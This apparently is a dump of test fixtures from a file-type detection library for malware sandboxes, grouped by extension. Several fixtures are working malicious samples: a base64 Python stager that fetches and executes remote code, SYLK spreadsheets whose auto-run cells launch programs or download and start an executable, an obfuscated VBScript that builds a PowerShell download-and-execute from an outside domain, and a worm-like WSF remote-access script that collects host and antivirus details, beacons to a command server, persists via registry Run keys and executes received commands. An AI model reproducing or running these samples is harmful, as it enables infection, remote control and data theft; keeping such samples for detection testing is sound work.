123 |         Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
124 |         Write-Error $_
125 |     }
126 | }
127 | 
128 | 


--------------------------------------------------------------------------------
/tests/files/extension/ps1/1e2485d575260b927edb183402fcb36b2226f8ea0158a2da71df4aab70364db0:
--------------------------------------------------------------------------------
1 | Get-WmiObject -Class Win32_OperatingSystem –ComputerName localhost |
2 | Select-Object -Property CSName,LastBootUpTime
3 | 


--------------------------------------------------------------------------------
/tests/files/extension/py/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/py/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/py/ad945f8dbefc45721335130049b9ddcbb50a3e1fde045eb5a825250b1433880b:
--------------------------------------------------------------------------------
1 | import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzAuMC4wLjAnLDIzMzMzKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKaW1wb3J0IGJpbmFzY2lpCnMuc2VuZChiaW5hc2NpaS5hMmJfaGV4KCdkMTEyMDMyMWEyOTE5OGJhNzg1YzZkNDgyNDlmNDQ2YScpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))


--------------------------------------------------------------------------------
/tests/files/extension/rar/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/rar/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/rar/b11694e84acf5025d9ab27093089d55af000ceb1f823f6c4767281e013cac505:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/rar/b11694e84acf5025d9ab27093089d55af000ceb1f823f6c4767281e013cac505


--------------------------------------------------------------------------------
/tests/files/extension/rar/cbe6d7395541c3593f4e7c87bbadf5eaf1c71d33be69db46322381fc914ef4e8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/rar/cbe6d7395541c3593f4e7c87bbadf5eaf1c71d33be69db46322381fc914ef4e8


--------------------------------------------------------------------------------
/tests/files/extension/rtf/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/rtf/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/slk/04a24329e577b82f1583e10008cb307603f71e269a4ff089519715b64a12486d:
--------------------------------------------------------------------------------
1 | ID;P 
2 | O;E 
3 | NN;NAuto_open;ER101C1
4 | C;X1;Y101;EEXEC("CALC.EXE") 
5 | C;X1;Y102;EHALT() 
6 | E 
7 | 


--------------------------------------------------------------------------------
/tests/files/extension/slk/a185174e76d43ca8f27f1b47b38e4ff0e5cd32899b29f3c7bf9e93c3d23e8bd3:
--------------------------------------------------------------------------------
  1 | ID;PWXL;N;E
  2 | P;PGeneral
  3 | P;P0
  4 | P;P0.00
  5 | P;P#,##0
  6 | P;P#,##0.00
  7 | P;P#,##0_);;\(#,##0\)
  8 | P;P#,##0_);;[Red]\(#,##0\)
  9 | P;P#,##0.00_);;\(#,##0.00\)
 10 | P;P#,##0.00_);;[Red]\(#,##0.00\)
 11 | P;P"$"#,##0_);;\("$"#,##0\)
 12 | P;P"$"#,##0_);;[Red]\("$"#,##0\)
 13 | P;P"$"#,##0.00_);;\("$"#,##0.00\)
 14 | P;P"$"#,##0.00_);;[Red]\("$"#,##0.00\)
 15 | P;P0%
 16 | P;P0.00%
 17 | P;P0.00E+00
 18 | P;P##0.0E+0
 19 | P;P#\ ?/?
 20 | P;P#\ ??/??
 21 | P;Pm/d/yyyy
 22 | P;Pd\-mmm\-yy
 23 | P;Pd\-mmm
 24 | P;Pmmm\-yy
 25 | P;Ph:mm\ AM/PM
 26 | P;Ph:mm:ss\ AM/PM
 27 | P;Ph:mm
 28 | P;Ph:mm:ss
 29 | P;Pm/d/yyyy\ h:mm
 30 | P;Pmm:ss
 31 | P;Pmm:ss.0
 32 | P;P@
 33 | P;P[h]:mm:ss
 34 | P;P_("$"* #,##0_);;_("$"* \(#,##0\);;_("$"* "-"_);;_(@_)
 35 | P;P_(* #,##0_);;_(* \(#,##0\);;_(* "-"_);;_(@_)
 36 | P;P_("$"* #,##0.00_);;_("$"* \(#,##0.00\);;_("$"* "-"??_);;_(@_)
 37 | P;P_(* #,##0.00_);;_(* \(#,##0.00\);;_(* "-"??_);;_(@_)
 38 | P;FCalibri;M220;L9
 39 | P;FCalibri;M220;L9
 40 | P;FCalibri;M220;L9
 41 | P;FCalibri;M220;L9
 42 | P;ECalibri;M220;L9
 43 | P;ECalibri Light;M360;L55
 44 | P;ECalibri;M300;SB;L55
 45 | P;ECalibri;M260;SB;L55
 46 | P;ECalibri;M220;SB;L55
 47 | P;ECalibri;M220;L18
 48 | P;ECalibri;M220;L21
 49 | P;ECalibri;M220;L61
 50 | P;ECalibri;M220;L63
 51 | P;ECalibri;M220;SB;L64
 52 | P;ECalibri;M220;SB;L53
 53 | P;ECalibri;M220;L53
 54 | P;ECalibri;M220;SB;L10
 55 | P;ECalibri;M220;L11
 56 | P;ECalibri;M220;SI;L24
 57 | P;ECalibri;M220;SB;L9
 58 | P;ECalibri;M220;L10
 59 | P;ECalibri;M220;L9
 60 | P;ECalibri Light;M360;L55
 61 | P;ECalibri;M300;SB;L55
 62 | P;ECalibri;M260;SB;L55
 63 | P;ECalibri;M220;SB;L55
 64 | P;ECalibri;M220;L18
 65 | P;ECalibri;M220;L21
 66 | P;ECalibri;M220;L61
 67 | P;ECalibri;M220;L63
 68 | P;ECalibri;M220;SB;L64
 69 | P;ECalibri;M220;SB;L53
 70 | P;ECalibri;M220;L53
 71 | P;ECalibri;M220;SB;L10
 72 | P;ECalibri;M220;L11
 73 | P;ECalibri;M220;SI;L24
 74 | P;ECalibri;M220;SB;L9
 75 | P;ECalibri;M220;L10
 76 | P;ECalibri;M220;L9
 77 | P;ECalibri Light;M360;L55
 78 | P;ECalibri;M300;SB;L55
 79 | P;ECalibri;M260;SB;L55
 80 | P;ECalibri;M220;SB;L55
 81 | P;ECalibri;M220;L18
 82 | P;ECalibri;M220;L21
 83 | P;ECalibri;M220;L61
 84 | P;ECalibri;M220;L63
 85 | P;ECalibri;M220;SB;L64
 86 | P;ECalibri;M220;SB;L53
 87 | P;ECalibri;M220;L53
 88 | P;ECalibri;M220;SB;L10
 89 | P;ECalibri;M220;L11
 90 | P;ECalibri;M220;SI;L24
 91 | P;ECalibri;M220;SB;L9
 92 | P;ECalibri;M220;L10
 93 | P;ESegoe UI;M200;L9
 94 | P;ECalibri;M220;L9
 95 | P;ECalibri;M220;SB;L9
 96 | P;ECalibri;M220;L9
 97 | F;P0;DG0G8;M300
 98 | B;Y18;X9;D0 0 17 8
 99 | O;L;D;U;V0;K47;G100 0.001
100 | C;Y1;X1;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
101 | C;Y2;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
102 | C;Y3;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
103 | C;Y4;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
104 | C;Y5;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
105 | C;Y6;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
106 | C;Y7;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
107 | C;Y8;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
108 | C;Y9;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
109 | C;Y10;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
110 | C;Y11;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
111 | C;Y12;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
112 | C;Y13;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
113 | C;Y14;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
114 | C;Y15;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
115 | C;Y16;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
116 | C;Y18;X9;K#REF!;ECMD|'"/c powershell.exe -w hidden -nop -ep bypass -Command (new-object System.Net.WebClient).DownloadFile(''http://localhost/evil'',''xPRGvI.exe'');; & start c:\\Windows\\System32\\cmd.exe /c xPRGvI.exe" '!_xlbgnm.A1
117 | E
118 | 


--------------------------------------------------------------------------------
/tests/files/extension/url/40e1c541406fd6d252810cbca40562ba3c3355064607dddc174fc8ab77fa8546:
--------------------------------------------------------------------------------
1 | [{000214A0-0000-0000-C000-000000000046}]
2 | Prop3=19,9
3 | [InternetShortcut]
4 | URL=file://localhost/calc.exe
5 | IconFile=C:\Windows\system32\shell32.dll
6 | IconIndex=137
7 | IDList=
8 | HotKey=0
9 | 


--------------------------------------------------------------------------------
/tests/files/extension/vbs/8cea5e1f59cc336a5b13929e3a0f41c8a84434cb1d9237e8320bc0f29f3a2c4e:
--------------------------------------------------------------------------------
 1 | Attribute VB_TEST = FOO
 2 | 
 3 | strComputer = "."
 4 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
 5 | Set colProcesses = objWMIService.ExecQuery _
 6 |     ("Select * from Win32_Process Where Name = 'Dfrgntfs.exe'")
 7 | If colProcesses.Count = 0 Then
 8 |     Wscript.Echo " Dfrgntfs.exe is not running."
 9 | Else
10 |     Wscript.Echo " Dfrgntfs.exe is running."
11 | End If
12 | 
13 | For i = 1 to 5
14 |     Wscript.echo i
15 | Next
16 | 
17 | Public Sub hello()
18 |     If 1
19 |         Wscript.Echo "hello"
20 | End Sub
21 | 
22 | Function hello2()
23 |     Dim var1
24 | End Function
25 | 


--------------------------------------------------------------------------------
/tests/files/extension/vbs/a0f80af23c1b1dc0ade98bd3108f55b7c82a86e7b6b768d9ee39053b6c486aaf:
--------------------------------------------------------------------------------
 1 | Dim WAITPLZ, WS
 2 | WAITPLZ = DateAdd(Chr(115), 4, Now())
 3 | Do Until (Now() > WAITPLZ)
 4 | Loop
 5 | 
 6 | CO = " $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}s:/{end}/manorakus.top/LLLLLLLOOOOOOOOODDDDDDD/IN.PNG'')'.replace('{end}', '');"
 7 | AE = " -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', '');"
 8 | CM = " $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', '');"
 9 | GN = "I`E`X $JI|I`E`X" + " " 
10 | GA = "$JI=($c1,$c4,$c3 -Join '');"
11 | 
12 | ORG = AE + CM + CO + GA + GN
13 | 
14 | WS = Chr(87) & Chr(83) + "cr" + StrReverse(".tpi") + Chr(83) & Chr(104) + "ell"
15 | 
16 | set INFO = CreateObject(WS)
17 | 
18 | 
19 | AD = Chr(Chr(49) & Chr(49) & Chr(50)) & Chr(Chr(49) & Chr(49) & Chr(49))+Chr(Chr(49) & Chr(49) & Chr(57)) & Chr(101)+Chr(114) & Chr(115) & Chr(104)+Chr(101) & Chr(108)+Chr(108) & Chr(32)
20 | 
21 | 'INFO.Run AD + ORG, Chr(48)
22 | 
23 | Execute("INFO.Run AD + ORG, Chr(48)")


--------------------------------------------------------------------------------
/tests/files/extension/wsf/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/wsf/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/wsf/250c42b5442738d19494dac851ec40512eac58941e0bfa9e9efd726183a97851:
--------------------------------------------------------------------------------
  1 | <job id="0.0.0.0">
  2 | <script language="VBScript">
  3 | Dim arr
  4 | arr = Array (Chr(101)&Chr(120)&Chr(101)&Chr(99)&Chr(117)&Chr(116)&Chr(101)&Chr(32)&Chr(83)&Chr(40)&Chr(49)&Chr(41), "w.quit", "go=a.displayName", "W.Sleep 6000", "Set B=GetObject(y(0)).InstancesOf(y(m))","set w = WScript","Set B=GetObject(y(3)).InstancesOf(y(4))","X.send A","Pt=X.responsetext","nf=nf&s&c","fu = w.scriptfullname","wn=w.scriptname","set wr = fs.OpenTextFile(fu,1)","f = wr.ReadAll","wr.close()","f = replace(f,ch&vn&ch,ch&s(1)&ch)","set wr = fs.OpenTextFile(fu,2,false)","wr.Write f","wr.close()","X.Open ""POST"",""http://google-drive.myq-see.com:5399/""&C,false","X.setrequestheader ""User-Agent:"",nf","nf=nf&s&c&c&nt&c&u&c","vn=""vw0rm""","T=""winmgmts:\\localhost\root\securitycenter""","s=ex(""COMPUTERNAME"")","s=ex(""USERNAME"")","s(1) = replace(s(1),""|U|"",""|V|"")","set wr = fs.OpenTextFile(fu,2,false)","S(1) = replace(S(1),""%f"",fu)","S(1) = replace(S(1),""%n"",wn)","S(1) = replace(S(1),""%sfdr"",dr)")
  5 | On error resume next
  6 | j = array(Chr(87)&Chr(83)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(46)&Chr(83)&Chr(104)&Chr(101)&Chr(108)&Chr(108),"Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
  7 | g = array(Chr(72)&Chr(75)&Chr(67)&Chr(85),"HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
  8 | y= array(Chr(119)&Chr(105)&Chr(110)&Chr(109)&Chr(103)&Chr(109)&Chr(116)&Chr(115)&Chr(58),"win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
  9 | function go(m)
 10 | if m=4 then
 11 | Execute(arr(23))
 12 | Execute(arr(6))
 13 | for each a in b
 14 | Execute(arr(2))
 15 | exit for
 16 | next
 17 | Set B=GetObject(y(3) & Chr(50)).InstancesOf(y(4))
 18 | for each a in b
 19 | go=a.displayName
 20 | exit for
 21 | next
 22 | if go="" then go="Not-found"
 23 | else
 24 | Execute(arr(4))
 25 | for each a in b
 26 | if m = 1 then
 27 | go=a.volumeserialnumber
 28 | elseif m = 2 then
 29 | go=a.caption
 30 | end if
 31 | exit for
 32 | next
 33 | end if
 34 | end function
 35 | Execute(arr(5))
 36 | set sh = Cr(0)
 37 | set fs = Cr(1)
 38 | Function Cr(N)
 39 | Set Cr = CreateObject(j(N))
 40 | End Function
 41 | function Ex(s)
 42 | Ex = sh.ExpandEnvironmentStrings(Chr(37)&s&Chr(37))
 43 | end function
 44 | function Pt(C,A)
 45 | Pt=""
 46 | Set X=Cr(3)
 47 | Execute(arr(19))
 48 | Execute(arr(20))
 49 | Execute(arr(7))
 50 | Execute(arr(8))
 51 | end function
 52 | Function nf
 53 | nf=""
 54 | i=go(1)
 55 | s=VN & Chr(95) & i
 56 | nf=nf&s&c
 57 | Execute(arr(24))
 58 | nf=nf&s&c
 59 | Execute(arr(25))
 60 | execute (arr(9))
 61 | s=go(2)
 62 | nf=nf&s&c
 63 | s=go(4)
 64 | Execute(arr(21))
 65 | End Function
 66 | Execute(arr(22))
 67 | U=""
 68 | ch = chrw(34)
 69 | c = chrw(92)
 70 | Execute(arr(10))
 71 | Execute(arr(11))
 72 | NT=Chr(78)&Chr(111)
 73 | if fs.fileexists(ex(Chr(87)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)) & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
 74 | NT=Chr(89)&Chr(101)&Chr(115)
 75 | end if
 76 | U= sh.regread(g(2))
 77 | if U="" then
 78 | if mid(fu,2)=Chr(58)&Chr(92) & wn then
 79 | U=Chr(84)&Chr(82)&Chr(85)&Chr(69)
 80 | sh.regwrite g(2), U, g(5)
 81 | else
 82 | U=Chr(70)&Chr(65)&Chr(76)&Chr(83)&Chr(69)
 83 | sh.regwrite g(2), U, g(5)
 84 | end if
 85 | end if
 86 | spl=Chr(124)&Chr(86)&Chr(124)
 87 | while true
 88 | s=split(Pt(Chr(86)&Chr(114)&Chr(101),""),spl)
 89 | select case s(0)
 90 | case Chr(101)&Chr(120)&Chr(99)
 91 | sa= s(1)
 92 | execute sa
 93 | case Chr(83)&Chr(99)
 94 | s2 = Ex(Chr(116)&Chr(101)&Chr(109)&Chr(112)) & "\" & s(2)
 95 | set wr = fs.OpenTextFile(s2,2,True)
 96 | wr.Write s(1)
 97 | wr.Close()
 98 | sh.run s2, 6
 99 | case Chr(82)&Chr(70)
100 | s2 = Ex(Chr(116)&Chr(101)&Chr(109)&Chr(112)) & "\" & s(2)
101 | set wr = fs.OpenTextFile(s2,2,True)
102 | wr.Write s(1)
103 | wr.Close()
104 | sh.run s2
105 | case Chr(82)&Chr(101)&Chr(110)
106 | Execute(arr(12))
107 | Execute(arr(13))
108 | Execute(arr(14))
109 | Execute(arr(15))
110 | Execute(arr(16))
111 | Execute(arr(17))
112 | Execute(arr(18))
113 | case Chr(85)&Chr(112)
114 | Execute(arr(27))
115 | Execute(arr(26))
116 | wr.Write s(1)
117 | wr.Close()
118 | sh.run Chr(119)&Chr(115)&Chr(99)&Chr(114)&Chr(105)&Chr(112)&Chr(116)&Chr(46)&Chr(101)&Chr(120)&Chr(101)&Chr(32)&Chr(47)&Chr(47)&Chr(66)&Chr(32) & ch & fu & ch, 6
119 | w.quit
120 | case Chr(67)&Chr(108)
121 | W.quit
122 | case Chr(85)&Chr(110)
123 | Execute(arr(28))
124 | Execute(arr(29))
125 | Execute(arr(30))
126 | execute (arr(0))
127 | execute (arr(1))
128 | end select
129 | execute (arr(3))
130 | wend
131 | </script>
132 | </job>


--------------------------------------------------------------------------------
/tests/files/extension/wsf/script1:
--------------------------------------------------------------------------------
 1 | <job id="PERLandVBS">
 2 |    <script language="PerlScript">
 3 |       sub PerlHello {
 4 |          my $str = @_[0];
 5 |          $WScript->Echo($str);
 6 |       }
 7 |    </script>
 8 | 
 9 |    <script language="VBScript">
10 |       WScript.Echo "Hello from VBScript"
11 |       PerlHello "Hello from PERLScript"
12 |    </script>
13 | </job>
14 | 


--------------------------------------------------------------------------------
/tests/files/extension/xlam/123fc08718d27577a6f0ffdd34439ca6c909b7a0c0bced115213435518c9cf07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlam/123fc08718d27577a6f0ffdd34439ca6c909b7a0c0bced115213435518c9cf07


--------------------------------------------------------------------------------
/tests/files/extension/xlam/c542f45cec9034b00be5a64cae75193d7816c58e5df889cbc638b991f7da0c9f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlam/c542f45cec9034b00be5a64cae75193d7816c58e5df889cbc638b991f7da0c9f


--------------------------------------------------------------------------------
/tests/files/extension/xls/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xls/.gitkeep


--------------------------------------------------------------------------------
/tests/files/extension/xls/29f9eefd8c3e34681533ff636bd314990929d623024d2322b94f8e0b76428163:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xls/29f9eefd8c3e34681533ff636bd314990929d623024d2322b94f8e0b76428163


--------------------------------------------------------------------------------
/tests/files/extension/xls/bc1d04bcb1139378660aa23c9bf29866d29860fe7f3643fa28e017bdd5f60d55:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xls/bc1d04bcb1139378660aa23c9bf29866d29860fe7f3643fa28e017bdd5f60d55


--------------------------------------------------------------------------------
/tests/files/extension/xlsb/377888b75eaf66d508d728629a6dc758bb7fbebc1a265dc4c3be6ba24c67e7da:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsb/377888b75eaf66d508d728629a6dc758bb7fbebc1a265dc4c3be6ba24c67e7da


--------------------------------------------------------------------------------
/tests/files/extension/xlsb/875a8476e3a6f11afeeee9bd613f9e81aa79a61a64b6c1c581e00b7e13ea4f63:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsb/875a8476e3a6f11afeeee9bd613f9e81aa79a61a64b6c1c581e00b7e13ea4f63


--------------------------------------------------------------------------------
/tests/files/extension/xlsm/09a7b755ef951bf7340990068b5331de9e0496c23c62785f54a154b5869bcc31:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsm/09a7b755ef951bf7340990068b5331de9e0496c23c62785f54a154b5869bcc31


--------------------------------------------------------------------------------
/tests/files/extension/xlsm/7b499302662fd5ef60aca03067618ca1ffb82ba1e60ebe888fa6fa0eac948118:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatching/sflock/7b4ddecd8462d3a8d3ea77ae5ed5757c0a500b1e/tests/files/extension/xlsm/7b499302662fd5ef60aca03067618ca1ffb82ba1e60ebe888fa6fa0eac948118


--------------------------------------------------------------------------------
/tests/files/extension/xlsx/.gitkeep:
--------------------------------------------------------------------------------
